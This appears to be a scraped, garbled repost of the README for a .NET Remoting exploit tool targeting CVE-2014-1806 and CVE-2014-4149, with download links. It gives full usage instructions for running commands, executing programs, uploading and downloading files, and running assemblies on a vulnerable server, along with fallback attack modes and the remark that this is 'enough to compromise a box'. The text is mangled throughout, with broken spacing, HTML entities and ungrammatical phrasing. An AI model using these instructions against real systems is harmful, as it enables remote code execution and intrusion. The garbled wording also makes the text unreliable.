Source:https://github.com/tyranid/exploitremotingserviceexploit Database mirror:http://www.exploit-db.com/ Sploits/35280.zip exploitremotingservice (c) James forshaw======================================== ===== a tool to exploit. NET Remoting Services vulnerable to cve-2014-1806 or cve-2014-4149. It only works on Windows although some aspects _might_ work in Mono on *nix. usage instructions:=============== ==== exploitremotingservice [options] URI command [command Args]copyright (c) James Forshaw 2014 Uri:the supported URI is as follows:tcp://host:port/objname -TCP connection on host and Portnameipc://channe l/objname -Named Pipe channel options: -s,--secure Enable Secure mode -p,--port=value Specify the local TCP port to listen on -i,--ipc=value & nbsp Specify listening pipe name for IPC channel --user=value specify username for secure mode --pass= value Specify password for secure mode --ver=VALUE Specify Version number for remote, 2 or 4 --usecom use DCOM backchannel instead of. NET remoting --remname=VALUE Specify the remote object name to Register -v,--VERBOSE          &Nbsp; Enable verbose Debug output --useser Uses old serialization tricks, only works on full Type filter services -h,-?,--help commands:exec [-wait] program [cmdline]: Execute a process on the hosting servercmd cmdline : Execute a command line Process and display stdoutput LocalFile remotefile : Upload a file to the hosting serverget& nbsp RemoteFile localfile : Download a file from the hosting serverls remotedir & nbsp; : List A remote directoryrun file [args] : Upload and execute an assembly, calls entry pointuser & nbsp; : Print the current usernamever : Print the OS version this tool Supports exploit both TCP remoting services and local IPC services. To test the exploit your need to know the name of the. NET Remoting service and the port it "slistening on (for TCP) o R the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls To: remotingconfiguration.registerwellknownservicetype or Activator.createinstance you CAn and try the exploit by constructing a appropriate URL. If TCP can use The url format tcp://hostname:port/servicename. For IPC use ipc://namedpipename/servicename. a simple test are to do: Exploitremotingservice serviceurl ver if Successful It should print the OS version of the hosting. NET Remoting Service. If you get an exception it might is fixed with cve-2014-1806. At this point try the com version using: exploitremotingservice-usecom serviceurl ver this Works best locally but can work remotely if you modify the COM configuration anddisable the firewall you should being able to Get it to work. If that still doesn ' t workthen it might is an up to date server. Instead can also try the full serialization version using. exploitremotingservice-useser serviceurl LS c:\ for The remoting service must be running with full TypeFilter mode-enabled (which is some, E SpeciAlly IPC Services). It also only works with the commands LS, Putand get. But that should is enough to compromise a box.
I ' ve provided an example service to test against.
: Http://pan.baidu.com/s/1s9BdW
. NET Remote Service remote execution Vulnerability (exp) China cold Dragon Collection and finishing debut